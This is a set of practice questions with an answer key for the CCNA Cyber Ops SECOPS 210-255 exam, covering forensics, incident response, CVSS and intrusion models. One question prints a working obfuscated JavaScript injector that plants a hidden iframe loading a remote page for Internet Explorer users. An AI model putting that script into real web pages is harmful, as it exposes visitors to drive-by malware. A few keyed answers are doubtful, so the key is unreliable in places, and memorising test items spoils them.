Practice : CCNA Cyber Ops - SECOPS # 210-255

An employee was convicted by an organization, for conducting corporate espionage using his personal mobile device. The device was taken into secure custody, pending analysis. Which of the following is the most appropriate methodology for mobile device forensic investigation?

Options are :

  • To steer clear of unwanted interactions with any wireless devices, such as Bluetooth and Wi-Fi, the radios of the mobile should be turned off.
  • If the mobile's display is switched on, the screen's contents should be photographed. The details such as the time of calls, emails, and other application information should be captured. (Correct)
  • The mobile should be switched off immediately to prevent its interaction with the surrounding environment.
  • The mobile should be returned to its owner as there is no judicial custody on the same.

Answer : If the mobile's display is switched on, the screen's contents should be photographed. The details such as the time of calls, emails, and other application information should be captured.

Which two actions could indicate suspicious behavior that deviates from the baseline and is certainly worth investigating further? (Choose two.)

Options are :

  • regular crashing of host devices which was not seen earlier (Correct)
  • small uploads of any kind that are leaving the network
  • a lot of downloaded data such as software or web browsing
  • a spike in the amount of outbound traffic (Correct)
  • a lot of inbound traffic to the web server in the network

Answer : regular crashing of host devices which was not seen earlier a spike in the amount of outbound traffic

When collecting evidence from the RAM, where should the forensic examiner look for data?

Options are :

  • Swap file (Correct)
  • Ext file
  • Log files
  • SAM file

Answer : Swap file

In the context of the Linux file system, which of the following allows fast file system recovery?

Options are :

  • Ext1
  • Journaling (Correct)
  • Ext2
  • FAT

Answer : Journaling

SQL injection attacks typically allow an attacker to perform which malicious activity?

Options are :

  • Inject malicious HTTP GET requests to obtain sensitive information stored on the SQL database of the web server.
  • Inject malicious SQL queries to obtain sensitive information from the back-end SQL database. (Correct)
  • Inject operating system commands to the vulnerable SQL database server.
  • Inject operating system commands to the vulnerable web server that has a trust relationship to the SQL database server.

Answer : Inject malicious SQL queries to obtain sensitive information from the back-end SQL database.

Which kind of evidence can be considered most reliable to arrive at an analytical assertion?

Options are :

  • direct (Correct)
  • corroborative
  • circumstantial
  • indirect
  • textual

Answer : direct

The process of relating multiple security event records to gain more clarity than is available from any security event record in isolation is called what?

Options are :

  • correlation (Correct)
  • normalization
  • summarization
  • corroboration
  • aggregation

Answer : correlation

During a forensic exercise, which of the following must be addressed first when investigating a cyber crime?

Options are :

  • Collecting and securing the evidence (Correct)
  • Protection of data gathered
  • Search and seizure of everything physically available at the crime scene
  • Engagement of legal and other law agencies

Answer : Collecting and securing the evidence

Which two statements are true regarding the installation or persistence phase in the cyber kill chain model? (Choose two.)

Options are :

  • Although the threat actor creates successful operations against the targeted host, individual or network, the attack cannot extend over a prolonged length of time.
  • The installation phase (or persistence phase) describes actions taken by the threat actor to establish a back door onto the targeted system. (Correct)
  • This phase does not survive the system re-boots and the attack needs to be initiated again.
  • Sustained access generally provides the threat actor a way to access the system whenever desired without alerting the system users or network defenders. (Correct)

Answer : The installation phase (or persistence phase) describes actions taken by the threat actor to establish a back door onto the targeted system. Sustained access generally provides the threat actor a way to access the system whenever desired without alerting the system users or network defenders.

Which of the following data recovery techniques can be used to recover partly lost or partly overwritten files?

Options are :

  • Hash replacement
  • File carving (Correct)
  • Data mining
  • Rainbow tables

Answer : File carving

Regarding the diamond model, what four nodes are used to model an intrusion? (Choose four.)

Options are :

  • adversary (Correct)
  • capability (Correct)
  • attacker
  • capacity
  • path
  • vector
  • infrastructure (Correct)
  • victim (Correct)
  • network

Answer : adversary capability infrastructure victim

Which four of the following are attack capabilities that are available with the China Chopper RAT Trojan? (Choose four.)

Options are :

  • database management (Correct)
  • virtual terminal (command shell) (Correct)
  • brute force password (Correct)
  • file management (Correct)
  • crypto locker
  • SSL/TLS session decode

Answer : database management virtual terminal (command shell) brute force password file management

Which of the following is a concern regarding full packet capture data?

Options are :

  • 2. Storage resources may limit the duration of full packet capture retention.
  • Numbered 1, 2, and 3 options are all concerns. (Correct)
  • 3. The location of sensing interfaces affects the visibility that the data provides.
  • 1. NIC performance features such as TCP segmentation offload can distort the collected full packet capture.
  • Only numbered 2 and 3 options are concerns.

Answer : Numbered 1, 2, and 3 options are all concerns.

Which option creates a display filter on Wireshark on a host IP address or name?


Options are :

  • ip.address ==
    or ip.network ==
  • [tcp|udp] ip.[src|dst] port
  • ip.addr == or ip.name ==
  • ip.addr == or ip.host == (Correct)

Answer : ip.addr == or ip.host ==

Which option describes the code that is shown here?

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{})) < /script>


Options are :

  • normal JavaScript
  • Unicode-encoded script
  • obfuscated JavaScript (Correct)
  • Punycode-encoded script

Answer : obfuscated JavaScript

Which two statements are true regarding the command-and-control phase in the cyber kill chain model? (Choose two.)

Options are :

  • APT malware and most other forms of implants do not require manual interaction with the target to begin the process of data exfiltration or other reconnaissance actions that are external to the outside network.
  • CnC is the process of the external threat actor beaconing inbound connection to secure servers or hosts in an organization to establish a communication channel.
  • CnC is the process of the exploited hosts beaconing outbound or out of the network to an Internet-based controller to establish a communications channel. (Correct)
  • Once CnC is established with the exploited target, threat actors have access to the target system and ultimately the entire network itself. (Correct)

Answer : CnC is the process of the exploited hosts beaconing outbound or out of the network to an Internet-based controller to establish a communications channel. Once CnC is established with the exploited target, threat actors have access to the target system and ultimately the entire network itself.

From a security perspective, why is it important to employ a clock synchronization protocol on a network?

Options are :

  • to construct an accurate timeline of events when responding to an incident (Correct)
  • so that everyone knows the local time
  • to guarantee that updates are pushed out according to schedule
  • to ensure employees adhere to work schedule

Answer : to construct an accurate timeline of events when responding to an incident

The practice of digital forensics does not pertain to which of the following?

Options are :

  • Application of scientific principles to the analysis of evidence
  • Application of scientific principles to the preservation of evidence
  • Application of scientific principles to the collection of evidence
  • Application of scientific principles to the declaration of evidence (Correct)

Answer : Application of scientific principles to the declaration of evidence

Which of the following statements best describes metadata?

Options are :

  • Data about data (Correct)
  • Concealed data
  • Data about packet headers
  • Data important to the investigation

Answer : Data about data

An analyst is reviewing Sguil events relating to Windows Event logs being cleared by someone with "system level" privileges. Which action below might be the next step for the analyst to take?

Options are :

  • Disregard event as a false positive, as Windows Event logs are generally cleared on a routine basis.
  • Perform a sort based on destination IP to discover what other systems connected to the workstation. (Correct)
  • Download the Identity access logs from the Identity Access Manager server, to see who was accessing the machine 24 hours before the event.
  • Mitigate the issue by logging in to the Windows machine, and manually clear the Windows Event Logs as Administrator, thus resetting the access log entries.

Answer : Perform a sort based on destination IP to discover what other systems connected to the workstation.

Regarding log mining, which statement is true about log clustering?

Options are :

  • Log clustering can be used to make predictions about unknown future attacks or events.
  • Log clustering labels data packets, allowing them to traverse through the network on different paths but still remaining identifiable to the destination node when it is reconstructed.
  • Log clustering can be used to mine through large amounts of data to build profiles and to identify anomalous behavior. (Correct)
  • Log clustering is an interpretation of a chain of consecutive events that occur during a set period.
  • Log clustering can be used to reconstruct network traffic or to follow it.

Answer : Log clustering can be used to mine through large amounts of data to build profiles and to identify anomalous behavior.

Which of the following events is also known as a benign trigger?

Options are :

  • True positive
  • False positive (Correct)
  • True negative
  • False negative

Answer : False positive

The scope metric is part of which CVSS v3.0 metrics group?

Options are :

  • base (Correct)
  • maturity
  • temporal
  • environmental

Answer : base

Which type of threat actor poses the greatest security risk to an organization?

Options are :

  • hacktivist
  • insider threat (Correct)
  • script kiddie
  • nation-state threat actor

Answer : insider threat

Digital evidence is important in bringing the culprit to justice. When a forensic examiner accidentally alters or damages digital evidence, it is referred to as what?

Options are :

  • Contamination (Correct)
  • Manipulation
  • File probing
  • File carving

Answer : Contamination

Which of the following terms is used to describe the movement and location of physical evidence from the time it is obtained until the time it is presented in court?

Options are :

  • Chain of custody (Correct)
  • Chain of custodian
  • Client victim chain
  • Chain of evidence

Answer : Chain of custody

Which three processes and workflows often fall under the responsibilities of a SOC? (Choose three.)

Options are :

  • business applications software life-cycle management
  • threat intelligence and hunting (Correct)
  • end-user passwords change management
  • cybersecurity incident management (Correct)
  • governance and compliance management (Correct)

Answer : threat intelligence and hunting cybersecurity incident management governance and compliance management

The report confidence metric is part of which CVSS v3.0 metrics group?

Options are :

  • maturity
  • temporal (Correct)
  • base
  • environmental

Answer : temporal

In an organization dealing with important customer data, an employee deliberately deleted a file pertinent to a high value deal. Which Windows log is most likely to contain information about a file being deleted?

Options are :

  • IIS logs
  • SAM file
  • Security logs (Correct)
  • Configuration logs

Answer : Security logs

Which CVSSv3 metric captures the level of access that is required for a successful attack?

Options are :

  • attack complexity
  • attack vector
  • user interaction
  • privileges required (Correct)

Answer : privileges required

Which of the following is not a component of chain of custody?

Options are :

  • Time at which the evidence was acquired
  • The identification of the person who left the evidence (suspect) (Correct)
  • Who discovered the evidence
  • Location at which the evidence was acquired

Answer : The identification of the person who left the evidence (suspect)

A signature driven IDS system cannot do which of the following?

Options are :

  • Detect zero-day (Correct)
  • Be implemented in promiscuous as well as in-line modes.
  • Detect passively
  • Detect network anomalies

Answer : Detect zero-day

Which option can be addressed when using retrospective security techniques?

Options are :

  • why the malware is still in our network
  • if the affected system needs replacement
  • how the malware entered our network (Correct)
  • if the affected host needs a software update

Answer : how the malware entered our network

A security engineer placed a packet sniffer in the network as a routine corporate exercise. What is the purpose of using a packet sniffer in a network?

Options are :

  • To track network connections
  • To monitor network traffic (Correct)
  • To detect illegal packets on the network
  • To scan network segments for faults

Answer : To monitor network traffic

Incident handling is an example of which CSIRT service?

Options are :

  • reactive services (Correct)
  • aggressive services
  • proactive services
  • backup services
  • passive services
  • restore services

Answer : reactive services

Which of the following regular expressions will match any IP address on the 10.10.0.0/24 network?

Options are :

  • %10.10.0\.$
  • 10\.10\.0\..* (Correct)
  • 10.[10..0].0
  • %10.10.0.0*

Answer : 10\.10\.0\..*

Which CVSSv3 metric value increases when attacks consume network bandwidth, processor cycles, or disk space?

Options are :

  • availability (Correct)
  • complexity
  • confidentiality
  • integrity

Answer : availability

Which network device creates and sends the initial packet of a session?

Options are :

  • origination
  • destination
  • source (Correct)
  • network

Answer : source

Which section of the VERIS schema translates the incident details into a form that is more suitable for trending and analysis?

Options are :

  • incident description section (Correct)
  • incident tracking section
  • discovery and response section
  • impact assessment section
  • victim demographics section

Answer : incident description section

The CSIRT framework that defines a CSIRT can be described in terms of which four functions? (Choose four.)

Options are :

  • feedback
  • compliance
  • organization structure (Correct)
  • announcement
  • mission statement (Correct)
  • constituency (Correct)
  • relationships (Correct)
  • triage

Answer : organization structure mission statement constituency relationships

Which information in the packet capture could be used to identify the suspicious behavior if the packet is encrypted using IPsec ESP transport mode?

Options are :

  • payload
  • MAC address
  • IP addresses and ports (Correct)
  • ESP header

Answer : IP addresses and ports

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions